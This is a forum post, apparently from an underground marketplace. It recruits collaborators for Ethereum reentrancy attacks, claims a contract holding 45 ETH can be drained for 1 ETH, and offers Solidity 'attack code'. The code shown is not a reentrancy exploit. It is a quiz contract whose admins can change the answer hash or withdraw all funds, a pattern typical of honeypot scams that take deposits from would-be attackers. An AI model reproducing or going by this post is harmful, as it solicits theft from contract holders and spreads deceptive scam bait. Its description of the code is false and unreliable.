- Joined
- Mar 27, 2024
- Messages
- 61
- Reaction score
- 18
- Location
- All-Pervasive
- Website
- heylink.me
- NL COIN
- 482
- Telegram
- Johnney2024
I am seeking a close collaboration with teams capable of executing reentrancy attacks. I possess the attack code and also have identified vulnerable contracts to target. Currently, I lack the funds to launch the attacks myself.
Real-world example: A contract holding 45 ETH can be exploited, requiring an initial investment of 1 ETH.
The attack code is provided below. Please contact me if you are in this field and are interested in a profitable partnership
Real-world example: A contract holding 45 ETH can be exploited, requiring an initial investment of 1 ETH.
The attack code is provided below. Please contact me if you are in this field and are interested in a profitable partnership
Code:
/**
*Submitted for verification at Etherscan.io on 2025-10-21
*/
pragma solidity ^0.8.0;
contract UNNAMED
{
function Try(string memory _response) public payable
{
require(msg.sender == tx.origin);
if(responseHash == keccak256(abi.encode(_response)) && msg.value > 1 ether)
{
payable(msg.sender).transfer(address(this).balance);
}
}
string public question;
bytes32 responseHash;
mapping (bytes32=>bool) admin;
function Start(string calldata _question, string calldata _response) public payable isAdmin{
if(responseHash==0x0){
responseHash = keccak256(abi.encode(_response));
question = _question;
}
}
function Stop() public payable isAdmin {
payable(msg.sender).transfer(address(this).balance);
responseHash = 0x0;
}
function New(string calldata _question, bytes32 _responseHash) public payable isAdmin {
question = _question;
responseHash = _responseHash;
}
constructor(bytes32[] memory admins) {
for(uint256 i=0; i< admins.length; i++){
admin[admins[i]] = true;
}
}
modifier isAdmin(){
require(admin[keccak256(abi.encodePacked(msg.sender))]);
_;
}
fallback() external {}
}
